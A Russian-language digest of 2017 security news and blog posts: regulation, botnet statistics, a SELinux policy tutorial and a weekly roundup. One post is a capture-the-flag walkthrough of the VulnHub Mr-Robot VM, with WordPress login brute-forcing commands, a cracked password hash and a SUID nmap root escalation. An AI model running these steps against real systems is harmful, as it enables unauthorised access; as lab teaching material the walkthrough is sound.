    Вот так выглядят изменения в 17-й приказ, которые должны будут приняты в самое ближайшее время. В целом же можно говорить об усилении контроля за деятельностью по защите информации в госорганах и организациях, обрабатывающих информацию, обладателем которой  являются госорганы. Я попробовал набросать картинку тех изменений, которые происходят сейчас, происходили в самом недалеком будущем или будут происходить в самое ближайшее время. И вот что получилось:


    Если попробовать порассуждать, то получается, что, теоретически, можно ожидать новых требований по аттестации, которые были упомянуты в рассматриваемом проекте изменений 17-го приказа и которые должны быть облечены в некий формальний документ. А под это дело может быть ФСТЭК и вообще подходы к аттестации пересмотрит, а то действующие ГОСТы в этой области совсем никуда не годятся.

    ЗЫ. Кстати, если посмотреть на упомянутый выше перечень поручений, то там можно увидеть ряд пунктов, которые пока не стали достоянием гласности, что означает, что нас еще ждет нечто интересное.

    orig: 2017-01-23 02:10:10 / http://lukatsky.blogspot.com/2017/01/17_23.html (click post title)



    Secure Your Home Wi-Fi Network

    Be aware of all the devices connected to your home network, including baby monitors, gaming consoles, TVs, appliances or even your car. Ensure all those devices are protected by a strong password and/or are running the latest version of their operating system.

    orig: 2017-01-23 01:31:23 / http://securingthehuman.sans.org/u/dR2 (click post title)



    Уязвимость кодов open-source — растущая проблема

    Согласно прогнозу американской компании Black Duck Software, собирающей статистику по проектам open-source, в этом году количество атак на уязвимости в открытых исходных кодах увеличится на 20%.

    По данным Black Duck, которыми поделился с CSO вице-президент компании по ИБ-стратегии Майк Питтенджер (Mike Pittenger), с 2011 года доля коммерческих продуктов, наполовину и более состоящих из бесплатного, открытого кода, возросла с 3 до 33%. Коммерческие приложения в среднем используют более 100 open-source-компонентов, и две трети коммерческих приложений содержат код с известными уязвимостями.

    Хуже всего то, что покупатель зачастую не имеет возможности узнать, какие open-source-компоненты включает приобретаемый продукт. «Обычно компании не слишком предупредительны в этом отношении», — сетует собеседник CSO, отмечая, что даже в том случае, когда список компонентов предоставляется, он обычно неполон. «А сканирование бинарников без разрешения вендора является нарушением лицензионного соглашения и влечет большие неприятности», — добавляет Питтенджер.

    Некоторые крупные корпорации могут выйти из положения, запросив у вендора полный список компонентов или заказав сканирование специалистам. Отказаться вовсе от использования open-source — не выход: многие библиотеки с открытым исходным кодом являются стандартом де-факто. Написание такого же кода с нуля потребует времени, что затормозит вывод продуктов на рынок и в итоге снизит конкурентоспособность компании. Как следствие, темпы использования open-source в коммерческих продуктах непрерывно растут.

    Примерно такими же соображениями руководствуются разработчики приложений, обходящиеся своими силами. «Разработка текущих проектов обычно осуществляется при активной поддержке сообщества, являющегося стабильным источником свежих идей по защите и функциональности, — говорит Эд Мойл (Ed Moyle), директор ISACA (международной ассоциации профессионалов IT) по передовым практикам и исследованиям. — В некоторых ситуациях возможность аудита базового кода при наличии широких возможностей для кастомизации ПО — это несомненное преимущество с точки зрения безопасности. Практика показала: если есть коммерческий инструмент определенного назначения, то, скорее всего, уже создан и open-source-инструмент со схожим набором функций».

    Тем не менее слишком уповать на «семь нянек», как гласит поговорка, тоже не следует. «Аудит кода может провести кто угодно, однако все при этом, похоже, надеются друг на друга, и никто в итоге этим не занимается, — сокрушается Жаввад Малик (Javvad Malik), консультант по ИБ из AlienVault. — В том-то и проблема».

    Таким образом, контроль защищенности open-source-компонентов — это быстро растущая проблема, о которой не могут не знать злоумышленники. Такие коды присутствуют повсеместно, и одним эксплойтом можно поразить множество мишеней. Поскольку компоненты open-source трудно отслеживать в продуктах, пользователи лишены возможности регулярно их обновлять и патчить, а информация об уязвимостях в таком коде регулярно публикуется вместе с PoC-эксплойтами, что лишь на руку плохим парням.

    За последний год обострилась еще одна серьезная проблема — уязвимость Интернета вещей. «В смарт-устройствах и IoT используется большое количество открытых исходных кодов, и в итоге мы получили ботнет Mirai», — комментирует Малик.

    По оценке Black Duck, средний срок жизни уязвимости в коммерческом продукте составляет пять лет; более того, в кодах open-source ежегодно выявляются от 2 тыс. до 4 тыс. новых уязвимостей. Так, Heartbleed была обнаружена в библиотеке OpenSSL в начале 2014 года, однако, несмотря на активное освещение в СМИ и призывы ИБ-сообщества, темпы латания этой широко распространенной бреши долгое время оставляли желать лучшего. В прошлом году Heartbleed все еще присутствовала в 10% приложений, протестированных Black Duck.

    Устранение уязвимостей в open-source, по мнению Питтенджера, требует действий и от вендоров ПО, и от потребителей, а также более сознательного подхода к безопасности со стороны корпоративных разработчиков. Тем не менее эксперт ожидает, что картина здесь, вероятнее всего, ухудшится прежде, чем начнутся какие-то перемены.

    orig: 2017-01-23 00:03:42 / https://threatpost.ru/ujazvimost_kodov_open-source_rastushchaja_problema/20199/ (click post title)



    Intrusion Detection Evasion Techniques and Case Studies

    The number of security breaches is increasing significantly each year. Global Internet traffic is expected to be on the order of zettabytes for 2016 and then doubling by 2020. In addition to increased traffic, the percentage of attack traffic is also increasing. The sophistication of attacks is also increasing. Attacks range in complexity from simple protocol, insertion, or desynchronization attacks that exploit the vagueness and incompleteness of the RFCs to polymorphic blending attacks that camouflage attack and exfiltration traffic to match normal traffic for that particular network. Various evasion techniques have been described in articles within this field of study, but there has not been a collective discussion on the variety of evasion techniques. A comprehensive compilation of the most common evasion techniques is needed to aid Intrusion Detection System providers and to assist various decision makers as they determine how best to apply limited resources to protect assets. This paper is a case study analysis designed to detail the most common intrusion evasion techniques that exist in the wild today.

    orig: 2017-01-23 00:00:00 / https://www.sans.org/reading-room/whitepapers/detection/intrusion-detection-evasion-techniques-case-studies-37527 (click post title)



    VulnHub: Погружаемся в хакинг в стиле сериала Mr. Robot

    Я думаю многие смотрели сериал Mr. Robot, с каждым сезоном, о нем узнаёт всё больше народу, вот и VulnHub не остался в стороне. И не так уж давно там появилась Boot2Root виртуальная машина Mr-Robot: 1. Её решение, мы сегодня и рассмотрим.

    Реверса тут не будет, но будет несколько примеров демонстрирующих, то как из-за не верного назначения прав на критически важные файлы, ваша система может быть взломана. И так, начнём, нужно добыть 3 ключа.

    Ключ 1
    Получаем список портов, уже известным нам способом:
    $ sudo arp-scan -l -I wlan0 | grep "CADMUS COMPUTER SYSTEMS" | awk '{print $1}' | xargs sudo nmap -sV

    80/tcp open http Apache httpd
    443/tcp open ssl/http Apache httpd

    Далее запустим
    robotscan, который мы уже применяли в одной из статей:
    $ ./robotscan.py -u 'http://192.168.1.29' -e txt,php -w /usr/share/dirb/wordlists/big.txt -x 403

    Первый ключ:

    $ curl http://192.168.1.29/key-1-of-3.txt
    073403c8a58a1f80d943455fb30724b9

    Ключ 2
    Как вы заметили, там есть ещё 1 не типичный для WordPress файл: fsocity.dic. Как выяснилось, это уже готовый словарь для брута. Осталось удалить из него дубликаты:
    $ sort -u fsocity.dic > fsocity_sort.dic

    WPScan отказался искать доступных пользователей, поэтому придется это делать другим способом:
    P.S. WPScan проверяет URL вида: target_url/?author=$id
    В то время, как по умолчанию, при авторизации, скрипт wp-login.php возвращает «Invalid username» в случае если пользователь не найден, и «The password you entered for the username $username is incorrect»
    $ sudo patator http_fuzz url=http://192.168.1.29/wp-login.php method=POST body='log=FILE0&pwd=nn&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.1.29%2Fwp-admin%2F&testcookie=1' follow=1 accept_cookie=1 0=./fsocity_sort.dic -x ignore:fgrep='Invalid username'

    И спустя некоторое время получаем вывод:
    22:28:26 patator INFO — 200 4093:3643 0.262 | Elliot | 5474 | HTTP/1.1 200 OK
    22:28:26 patator INFO — 200 4093:3643 0.276 | elliot | 5473 | HTTP/1.1 200 OK
    22:28:27 patator INFO — 200 4093:3643 0.235 | ELLIOT | 5475 | HTTP/1.1 200 OK
    Логин есть, осталось подобрать пароль. В качестве словаря, воспользуемся тем же файлом:
    $ sudo ./wpscan.rb --url 192.168.1.29 --threads 50 --wordlist ./fsocity_sort.dic --username elliot

    Прокинем себе шелл через Metasploit:

    Первым делом изучаем содержимое директории с пользователями:

    Ключ здесь, но нужны креды пользователя robot. Открыв второй доступный файл, находим нужную нам информацию:

    $ cat password.raw-md5
    robot:c3fcd3d76192e4007dfb496cca67e13b

    Осталось расшифровать MD5 на ближайшем онлайн сервисе: abcdefghijklmnopqrstuvwxyz.

    Логинимся в виртуалке и получаем второй ключ:

    Ключ 3
    Третий ключ вероятно расположен у пользователя root. Посмотрим доступные SUID приложения:
    $ find / -perm -4000 2>/dev/null

    Ничего не обычного, кроме nmap'а. После запуска без параметров, получаем справку, и потенциальную уязвимость:

    Как сказал бы MrRobot:

    Взломать их было легко, они использовали старую версию nmap'а с поддержкой интерактивного режима, и не верно выставленные права, так что я с легкостью получил root доступ
    $ nmap --interactive

    Из интерактивного режима запускаем командную оболочку !sh, и забираем последний ключ:

    Вот и всё. Очередное подтверждение тому, как не верное разграничение прав, приводит к компрометации системы!

    orig: 2017-01-22 22:07:04 / https://habrahabr.ru/post/320106/ (click post title)



    Spamhaus подготовила годовую статистику по ботнетам

    Активисты Spamhaus обнародовали данные о ботнетах за прошедший год, доложив более чем о 7 тыс. командных серверов, работающих более чем в 1,1 тыс. сетей по всему миру. По свидетельству исследователей, обнаруженные командные сервера использовались для фишинга, хранения похищенных данных, махинаций с банковскими счетами, спама и DDoS-атак.

    Каждый год Spamhaus собирает все IP-адреса, на которых хостятся контроллеры ботнетов, в базу данных, известную как BCL. Трафик, направленный на эти адреса и исходящий с них, полностью блокируется. В BCL попадают лишь полностью контролируемые киберпреступниками сервера, на которых не содержатся никакие легитимные сервисы. Поэтому интернет-провайдер или оператор корпоративной сети может беспрепятственно заблокировать этот IP-адрес без ущерба для легитимного трафика. Остальные, скомпрометированные IP-адреса попадают в другой черный список, SBL, сигнализирующий о возможной вредоносной активности.

    В 2016 году каждый пятый IP-адрес, заблокированный Spamhaus, оказался командным сервером ботнета. Несмотря на то что количество подобных C&C-серверов остается достаточно высоким, по сравнению с 2015 годом их число сократилось на 13,8%. Тем не менее количество серверов, специально предназначенных только для хостинга контроллеров ботнетов, выросло на 11,8%. В настоящее время около 61,3% (около 4,5 тыс.) контроллеров ботнетов хостятся на отдельных серверах; этот тренд продолжает расти уже третий год и стал заметен еще в 2015 году, когда контроллеры ботнетов стали перемещаться со скомпрометированных ресурсов на специальные сервера, принадлежащие злоумышленникам.

    По словам аналитиков, причиной снижения количества заблокированных C&C ботнетов стали анонимайзеры типа Tor, которые не дают отследить реальное расположение командных центров. Для сетевых операторов в этом случае остается только один выход: полностью блокировать анонимайзеры, даже если это доставит неудобства законопослушным пользователям. С другой стороны, этой ситуации может помочь готовность анонимайзеров более эффективно противостоять нарушителям и преступникам.

    Что касается C&C-серверов, не скрывающихся в Дарквебе, Spamhaus выяснила, что в 2016 году операторы ботнетов чаще всего компрометировали сеть французского провайдера ovh.net (395 C&C-серверов), за ним расположился известный американский доменный регистратор godaddy.com (257 C&C-серверов). Количество вредоносных IP-адресов в этих сетях выросло по сравнению с прошлым годом. Также в первую пятерку наиболее населенных ботоводами сетей вошли enduance.com из США (167 C&C-серверов), hertsner.de из Германии (144) и российский хостинг ispserver.ru (128), хотя количество используемых ботнетами IP-адресов в них снизилось.

    Данная статистика включает в себя как скомпрометированные IP-адреса, так и специально выделенные для вредоносной активности сервера. В список попали в основном крупные провайдеры, так как в них хостится большее количество серверов и веб-сайтов, страдающих проблемами безопасности вроде незакрытых уязвимостей. Этими брешами любят пользоваться злоумышленники. Их излюбленные мишени — популярные CMS вроде WordPress, Joomla, Typo3 или Drupal.

    Но это всего лишь часть проблемы. Другая проблема, с которой приходится сталкиваться провайдерам, — это сервера, используемые исключительно для киберпреступных целей. Обычно для того, чтобы ввести провайдера в заблуждение и не дать отследить себя, ботоводы используют для регистрации фальшивые документы, данные скомпрометированных кредитных карт или аккаунтов платежных систем вроде PayPal.

    Согласно статистике Spamhaus за 2016 год, лидерами по количеству IP-адресов, используемых только для преступной деятельности, являются сети французского провайдера ovh.net (295 C&C-серверов), компании colocrossing.com из США (112) и  российского хостинг-провайдера ispserver.ru (109). Из лидеров этого списка за год дела улучшились только у российской компании: количество вредоносных IP-адресов в 2016 году снизилось в полтора раза.

    Также аналитики отметили, что в списке содержится много более мелких провайдеров, которые хостят непропорционально большое количество вредоносных IP-адресов. Специалисты объясняют этот феномен чрезмерным упрощением процесса регистрации в погоне за клиентами, недостатком персонала для обработки заявок и отслеживания аномальной активности или же размещением ЦОДа оператора в проблемной юрисдикции.

    По данным Spamhaus, в 2016 году ботнеты наиболее активно распространяли банкеры (Dridex, Gozi и Zeus — 263, 271 и 282 C&C-сервера соответственно), вымогатели (Locky, CryptoWall и TeslaCrypt — 404, 305 и 253 C&C-сервера соответственно) и бэкдоры (Neurevt и ISRStealer — 229 и 213 C&C-серверов соответственно). Наиболее активно распространяемым зловредом стал загрузчик Pony, также используемый для похищения учетных записей, — 602 командных сервера. На третье место в списке наиболее часто распространяемых вредоносных программ ворвались IoT-зловреды, управляемые с 393 C&C-серверов; такое количество IP-адресов активисты внесли в блок-листы всего за два месяца. Исследователи также отметили, что количество серверов, раздающих вымогатели, в 2016 году выросло в беспрецедентных масштабах.

    orig: 2017-01-22 21:39:49 / https://threatpost.ru/spamhaus-podgotovila-godovuyu-statistiku-po-botnetam/20196/ (click post title)



    Банки в РФ намерены создать единую базу биометрических данных клиентов

    Основой для БД может стать Единая система идентификации и аутентификации.

    Ведущие бизнес в России финансовые организации намерены создать единую базу биометрических данных своих клиентов. Как сообщает издание «Известия», соответствующие обсуждения уже ведутся с Центробанком и Минкомсвязи РФ, и в ближайшее время по данному вопросу состоится совещание.

    По мнению банков, создание единой базы намного упростит внедрение систем биометрической аутентификации пользователей. Поскольку без участия государства подобную технологию разработать нельзя, основой для нее может стать Единая система идентификации и аутентификации (ЕСИА), использующаяся для авторизации на портале госуслуг. В настоящее время финансовые организации уже создают базы биометрических данных, однако каждый банк делает это исключительно для себя и не обменивается ими с другими.

    Как отметил председатель Национального совета финансового рынка Андрей Емелин, главным вопросом при создании подобной БД является ее защищенность. По мнению эксперта, ЕСИА соответствует всем требованиям. С согласия граждан доступ к их данным из профилей может быть предоставлен финансовым организациям, и тогда банки смогут идентифицировать пользователей по биометрическим параметрам.

    orig: 2017-01-22 08:45:36 / http://www.securitylab.ru/news/485090.php (click post title)



    Разработка SELinux-модуля для приложения

    Давным-давно, в далекой-далекой стране
    … государственная служба NSA разработала систему безопасности для ядра и окружения Linux, и назвала ее SELinux. И с тех пор люди разделились на две категории: disabled/permissive и enforcing. Сегодня я покажу вам путь Силы и переведу на другую сторону всех желающих.Предположения
    В тексте будет содержаться много технической информации, поэтому автор предполагает, что читатель:


    Это все про вас? Тогда поехали!Базовые типы
    В качестве подопытного я взял
    jnode
    — достаточно типичное приложение, которое общается по сети, ходит в базу, читает конфиги, пишет свои данные и tmp-файлы и мониторит свое состояние (cpu, mem, disk).

    Создадим файл jnode.te (te = Type Enforcement)

    С чего нужно начать писать модуль? С описания базовых типов:

    policy_module(jnode, 1.0.0)
    # тип для процесса
    type jnode_t;
    # тип для исполняемого файла
    type jnode_exec_t;
    # тип для конфиг-файлов
    type jnode_conf_t;
    # тип для кэша ( аналог /var/cache/ )
    type jnode_cache_t;
    # тип для лог-файла
    type jnode_log_t;
    # тип для временных файлов
    type jnode_tmp_t;
    # тип для порта, который слушает jnode ( протокол binkp )
    type binkp_port_t;
    

    Почему так много? Потому, что это разные категории доступа для системы, например:
    Лирическое отступление
    Теоретически, почти на этом месте ( добавив только правило перехода ) можно прекратить писать модуль, скомпилировать его, установить в систему и промаркировать файловую систему при помощи chcon. После этого собрать логи при помощи утилиты audit2allow и получить несколько сотен абсолютно непонятных строк, которые будут что-то разрешать. Из них в дальнейшем получится модуль, который даже будет работать. Но понимания это вам не добавит, не так ли?

    Поэтому я предлагаю другой путь: читать заголовочные файлы и выбирать там то, что вам нужно. В /usr/share/selinux/devel/include/ можно найти несколько сотен .if-файлов, в которых содержатся стандартные макросы базовой политики SELinux. К сожалению, вам придется использовать grep и cat самостоятельно, я лишь покажу несколько основных макросов и то, как они облегчают жизнь.

    Макросы атрибутов
    Для облегчения жизни в SELinux существует понятие attribute — некого контейнера типов, (к) которому тоже можно назначать права доступа. Таким образов, добавив свой новый тип в тот или иной аттрибут мы автоматически выдаем ему стандартные права для этого атрибута. Чтоб не запоминать все эти атрибуты есть уже готовые макросы, которые размечают типы по атрибутам (часто по нескольким). Смотрите:
    #  это конфиг-файлы
    files_config_file(jnode_conf_t)
    # это какие-то файлы
    files_type(jnode_cache_t)
    # это лог-файлы
    logging_log_file(jnode_log_t)
    #  это временные файлы
    files_tmp_file(jnode_tmp_t)
    # а это порт
    corenet_port(binkp_port_t)
    

    Макросы стандартных разрешений
    Когда типы определены, можно назначить стандартное поведения для приложения. Для этого тоже воспользуемся макросами, они достаточно легко находятся по ключевым словам и делают код человекочитаемым:
    # Макрос приложения: добавляет тип jnode_t в список приложений
    # и разрешает ему стартовать из типа  jnode_exec_t
    application_domain(jnode_t, jnode_exec_t)
    # Макрос демона: добавляет тип jnode_t в список демонов,
    # разрешает его запускать через systemd
    # и назначает переход: если systemd запустит файл с типом jnode_exec_t,
    # то процесс получит тип jnode_t
    init_daemon_domain(jnode_t, jnode_exec_t)
    # разрешает типу jnode_t исполнять стандартные бинарники ( /bin, /usr/bin )
    corecmd_exec_bin(jnode_t)
    # разрешает типу jnode_t подключать библиотеки
    libs_use_ld_so(jnode_t)
    # разрешает типу jnode_t читать состояние системы ( cpu, memory )
    kernel_read_system_state(jnode_t)
    # разрешает типу jnode_t писать в /tmp
    files_rw_generic_tmp_dir(jnode_t)
    # разрешает типу jnode_t читать конфиг сети ( /etc/resolv.conf итд )
    sysnet_read_config(jnode_t)
    # разрешает типу jnode_t получать случайные числа из /dev/(u)random
    dev_read_rand(jnode_t)
    # разрешает типу jnode_t получать аттрибуты файловой системы ( свободное место )
    fs_getattr_xattr_fs(jnode_t)
    # разрешает типу jnode_t делать dns resolve
    sysnet_dns_name_resolve(jnode_t)
    # разрешает типу jnode_t ходить в /var/log ( r/o )
    logging_search_logs(jnode_t)
    # назначает правило: логи, которые создает процесс jnode_t, 
    # будут иметь тип jnode_log_t
    logging_log_filetrans(jnode_t, jnode_log_t, file)
    # назначает правило: tmp-файлы, которые создает процесс jnode_t, 
    # будут иметь тип jnode_tmp_t
    files_poly_member_tmp(jnode_t, jnode_tmp_t)
    # разрешает jnode_t делать bind() на любой адрес
    corenet_tcp_bind_generic_node(jnode_t)
    # разрешает jnode_t общаться с postgresql по unix-сокету
    postgresql_stream_connect(jnode_t)
    # разрешает jnode_t общаться с postgresql по сети
    corenet_tcp_connect_postgresql_port(jnode_t)
    

    Файл контекстов
    Теперь пришла пора привязать созданные типы к файловой системе. Создадим файл jnode.fc ( fc = File Context ).
    # исполняемый файл
    /opt/jnode/jnode.run		--	gen_context(system_u:object_r:jnode_exec_t)
    # все что r/o для сервиса назовем "конфигом"
    /opt/jnode(/.*)?			gen_context(system_u:object_r:jnode_conf_t)
    /opt/jnode/jar(/.*)    		gen_context(system_u:object_r:jnode_conf_t)
    # и отдельно сами конфиги
    /opt/jnode/point/.*\.cfg  		gen_context(system_u:object_r:jnode_conf_t)
    # сюда сервис сможет добавлять файлы ( но не удалять )
    /opt/jnode/fileechoes(/.*)?  		gen_context(system_u:object_r:jnode_cache_t)
    /opt/jnode/point(/.*)?  		gen_context(system_u:object_r:jnode_cache_t)
    # тут будут появляться и исчезать временные файлы и папки
    /opt/jnode/(inbound|temp)(/.*)? 	gen_context(system_u:object_r:jnode_tmp_t)
    # а сюда будут писаться логи
    /var/log/jnode(/.*)? gen_context(system_u:object_r:jnode_log_t)
    

    Сборка и установка
    Создадим какую-нибудь папку и положим туда файлы jnode.te и jnode.fc.
    Перейдем туда и выполним сборку:
    [root@jnode jnode]# make -f /usr/share/selinux/devel/Makefile 
    Compiling targeted jnode module
    /usr/bin/checkmodule:  loading policy configuration from tmp/jnode.tmp
    /usr/bin/checkmodule:  policy configuration loaded
    /usr/bin/checkmodule:  writing binary representation (version 17) to tmp/jnode.mod
    Creating targeted jnode.pp policy package
    rm tmp/jnode.mod.fc tmp/jnode.mod
    

    Установим модуль командой semodule -i jnode.pp и включим его командой semodule -e jnode.

    Назначим номер порта для типа binkp_port_t: semanage port -a -t binkp_port_t -p tcp 24554.

    Теперь необходимо переназначить контексты в соответствии с файлом контекстов:
    restoreconn -Rv /opt/jnode. Запускаем сервис через systemctl и начинаем ждать.

    Финальный audit2allow
    Через некоторое время (час, сутки — зависит от активности сервиса) можно выполнить команду audit2allow -b -r -t jnode_t и посмотреть, что еще приложение просит помимо того, что ему уже было дано. Разрешений получится немного — может 10-15 строчек, причем не все из них ему реально нужны. Тут уже решать вам — что оставить, а что убрать. В «ненужной» части замените allow на dontaudit — это избавит от повторяющегося мусора в логах. Кстати, обновите версию модуля — это позволит ядру понять, что его нужно обновить.setenforce 1
    Когда audit2allow покажет «пусто» — это значит, что все работает по плану и можно включать enforcing. Поздравляю, вы нашли Силу. Распоряжайтесь ею с умом.Полезные ссылки
    selinuxproject.org/page/AVCRules — описание allow-правил
    selinuxproject.org/page/TypeRules — описание type_ правил
    selinuxproject.org/page/ObjectClassesPerms — список классов и разрешений доступов
    danwalsh.livejournal.com — блог «отца» SELinux в RedHat и самой refpolicy

    orig: 2017-01-21 23:03:48 / https://habrahabr.ru/post/320100/ (click post title)



    Хакерский форум Darkode стал жертвой взлома

    Злоумышленники похитили информацию об учетных данных и IP-адресах пользователей площадки.

    Неизвестные злоумышленники атаковали хакерский форум Darkode и похитили базу данных с информацией об учетных данных его пользователей, сообщает Motherboard. Похищенные сведения также включают IP-адреса и адреса электронной почты. Этот факт особенно волнует администраторов ресурса, поскольку многие посетители могли быть вовлечены в незаконную деятельность.

    «Дорогой фейк Darkode, мы завладели вашим форумом. У ваших админов ужасная безопасность», - говорится в сообщении, опубликованном хакерами.

    По признанию одного из администраторов Darkode, известного как Bullets, отчасти атака оказалась успешной из-за повторного применения пароля, уже использовавшегося на другом взломанном сайте.

    «Мне хотелось взглянуть, что на самом деле происходит. Это единственная причина, по которой я присоединился [к форуму - ред.]. Я использовал распространенный пароль, так как думал, что не задержусь на сайте. Мне казалось, что даже если к нему получит доступ кто-нибудь еще, это не будет большой проблемой», - пояснил Bullets.

    Напомним, оригинальная торговая площадка Darkode,специализировавшаяся на продаже вредоносного ПО и похищенных данных, прекратила существование в 2015 году после операции ФБР. Однако в декабре 2016 года Darkode снова вернулся в игру.

    orig: 2017-01-21 08:19:10 / http://www.securitylab.ru/news/485089.php (click post title)



    Законопроект № 47571-7 "О безопасности КИИ РФ": замечания и предложения


    На данный момент он уже включен в Календарь рассмотрения вопросов Государственной Думой 27.01.2017. Паровоз, как говорится, уже ушёл. Тем не менее я решил опубликовать некоторые замечания и предложения по его корректировке: вдруг разработчики проекта мониторят ситуацию вокруг него. J Самое важное, с моей точки зрения, третье. 1. Название закона не соответствует статье 1 «Сфера действия настоящего Федерального закона»: - в названии – «О безопасности критической информационной инфраструктуры Российской Федерации»; - в статье 1 – «в целях ее устойчивого функционирования при проведении в отношении нее компьютерных атак». Либо название неоправданно расширяет сферу действия закона, либо статья 1 неоправданно сужает её: безопасность – это не только защита от компьютерных атак. 2. В статье 2: - в законе используются термины и их определения. Понятия используются бандитами на т.н. «стрелках»; - обеспечение безопасности критической информационной инфраструктуры Российской Федерации – это не «комплекс мер»! «Обеспечение» - процесс, «комплекс» - объект. «Обеспечение безопасности» - это, как минимум, «процесс реализации комплекса мер …»; - в определении понятия «объекты критической информационной инфраструктуры» допущено нарушение логического закона деления: указаны разнопорядковые объекты – «ИС, ИТС государственных органов» (по признаку принадлежности структуре) и «функционирующие в сферах» (по функциональному признаку). Это приведёт в дальнейшем к правовым коллизиям. В перечне отсутствуют объекты ЖКХ и жизнеобеспечения населения, а это гораздо более значимые объекты, чем многие из перечисленных. Вообще, перечисление конкретных сфер непродуктивно. Целесообразно указать признаки объектов, согласно которым следует относить их к КИИ; - субъекты критической информационной инфраструктуры – это не «государственные органы, юридические лица, владеющие…», а «юридические и физические лица, управляющие объектами критической информационной инфраструктуры и объектами обеспечения их деятельности». 3. То, что написано в «Финансово-экономическом обосновании к проекту федерального закона «О безопасности критической информационной инфраструктуры Российской Федерации»: Принятие федерального закона "О безопасности критической информационной инфраструктуры Российской Федерации" не потребует дополнительных расходов из федерального бюджета и не повлечет финансовых обязательств государства», – либо ошибка, либо обман: реализация данного проекта потребует колоссальных затрат бюджетных средств, т.к.: - основная масса объектов КИИ – государственные и деньги (немалые) на создание систем безопасности таких объектов и обеспечение их функционирования должны будут выделяться из государственного бюджета; - на создание и обеспечение деятельности федерального органа исполнительной власти, уполномоченного в области создания государственной системы обнаружения, предупреждения и ликвидации последствий компьютерных атак на информационные ресурсы Российской Федерации денежные средства (огромные) также будут выделяться из государственного бюджета; - государственный контроль в области обеспечения безопасности значимых объектов критической информационной инфраструктуры должен будет осуществляется на государственные (и опять же немалые) деньги.

    И это не все статьи расходов, которые понесёт государство в связи с реализацией данного закона. Кроме того, владельцы КИИ – юридические и физические лица, владеющие объектами КИИ на правах частной собственности, в соответствии с этим законом также будут вынуждены потратить денежные средства на реализацию систем их защиты, причём большие и в довольно короткие сроки, что однозначно неблагоприятно скажется на их коммерческой деятельности.

    orig: 2017-01-21 07:46:43 / http://gatamanov.blogspot.com/2017/01/47571-7.html (click post title)



    Security Week 03: закат SHA-1 продолжается, баг или фича в Whatsapp, уязвимости в роутерах не чинятся

    SHA-1 — все. Или нет? Следить за развитием событий вокруг этого алгоритма хеширования легко и приятно: несмотря на очевидную серьезность проблемы, она остается малоприменимой для практических атак, как минимум — массовых. Впервые я упоминал о SHA-1 в дайджесте аж от октября 2015 года. Проблемы с ним появились из-за того, что вычислительные ресурсы подешевели несколько быстрее, чем ожидалось. Эксперт по криптографии Брюс Шнайер в 2012 году предрекал, что через три года для создания коллизии при генерации хэшей потребуется 11 лет вычислений на условном сервере. Три года прошли, и выяснилось, что на самом деле (за счет развития технологий параллельных вычислений, и благодаря новым исследованиям в области криптографии) этот срок значительно меньше — всего 49 дней.

    Так как хеширование с помощью SHA-1 используется в весьма ответственных операциях, например при установке защищенного соединения с веб-сайтами, разработчики софта довольно оперативно начали делиться планами по выводу ненадежного алгоритма из эксплуатации. Начиная с 24 января (для Firefox, для других браузеров чуть позже) посещение сайта, не поддерживающего более стойкий алгоритм SHA-2 (обычно модификации SHA-256), будет приводить к разнообразным угрожающим предупреждениям у пользователей.

    По данным Facebook на конец 2015 года, 7% их аудитории, в основном жители развивающихся стран, по-прежнему пользовались браузерами или приложениями, не поддерживающими SHA-2. Более свежее исследование
    показывает
    , что ненадежные SHA-1 используют 35% сайтов в адресном пространстве IPv4, но среди них почти нет действительно популярных. Самые серьезные проблемы возникли не у сайтов и не у пользователей, а у платежных систем и разработчиков мобильных приложений. Главный вывод довольно детального обзора на Threatpost: несмотря на раннее обнаружение проблемы, публичное обсуждение решений, совместные усилия и прочее, в 2017 году SHA-1 станет нишевой проблемой, которая окончательно вряд ли когда-либо решится. А значит всегда будет риск зловредных манипуляций с подзабытым сервером, который то ли забыли обновить, то ли не смогли. Нельзя просто так взять и искоренить ненадежный алгоритм.

    В Whatsapp нашли уязвимость системы шифрования сообщений. Или не нашли.
    Новость. Блогпост с подробностями.

    В пятницу 13-го в газете Guardian была опубликована статья о том, что уязвимость в Whatsapp позволяет разработчикам мессенджера подслушивать пользователей при наличии шифрования переписки. Детали уязвимости следующие: протокол Signal, на котором основано шифрование в Whatsapp, генерирует уникальные ключи для связи между двумя пользователями. В случае, если пользователь находится в оффлайне, Whatsapp может поменять ключи, причем по-тихому, не уведомляя пользователей — если не включить в настройках соответсвующую функцию.

    То есть если меняет ключи, значит это зачем-то нужно, а зачем еще это нужно, кроме как для подслушивания? Разработчик Open Whisper Systems, ответственного за протокол Signal, Морли Марлинспайк попытался разрушить эту железную логику СМИ. Ситуация замены ключа шифрования, о которой идет речь, происходит в том случае, если серверу некуда доставлять сообщение. Например, произошла замена смартфона или было переустановлено приложение. В таком случае на сервере генерируется новый ключ, чтобы обеспечить доставку сообщения, когда пользователь вернется в сеть.

    Короче, баг оказался фичей. Вопрос в том, почему пользователей не уведомляют о смене ключей шифрования? Разработчики Whatsapp посчитали, что пользователей, большинство из которых в шифровании ничего не понимают, лишний раз пугать не стоит. В мессенджере Signal, например, считают, что стоит пугать, да и в Whatsapp эту настройку можно включить вручную. Тогда у вас появится возможность включить режим параноика: если (не важно по какой-причине) вы видите, что ключи сменились, вы можете сменить их еще раз, предположительно обеспечив себе режим максимальной приватности.

    Хотя параноикам это не поможет. Интересная новость про необходимость аккуратной трактовки аспектов кибербезопасности.

    Роутеры таиландского интернет-провайдера остаются уязвимыми через шесть месяцев после обнаружения уязвимости
    Новость. Исследование.

    Традиционная новость из мира «ненастоящего IoT». У таиландского интернет-провайдера TrueOnline обнаружились уязвимые роутеры производства малоизвестной компании Billion и известной Zyxel, в которых исследователи нашли массу способов неавторизованного перехвата контроля через веб-интерфейс (в том числе и снаружи). Судя по всему, речь идет об уязвимостях в кастомной прошивке — вендоры не при чем, хотя возможны варианты (в Zyxel сообщили, что речь идет о роутерах, давно снятых с производства)

    Уязвимости были найдены еще в июле этого года, но опубликовали их только сейчас по простой причине: интернет-провайдер начисто проигнорировал сообщения исследователей. В общем-то рутинная новость неплохо смотрится в контексте. В конце прошлого года эксперты «Лаборатории» обнаружили (новость и исследование) Android-троянец Switcher, который имеет функцию подмены записей DNS в роутерах, то есть используется как ступенька для захвата всей домашней сети жертвы.

    Древности
    «Nina-1600»

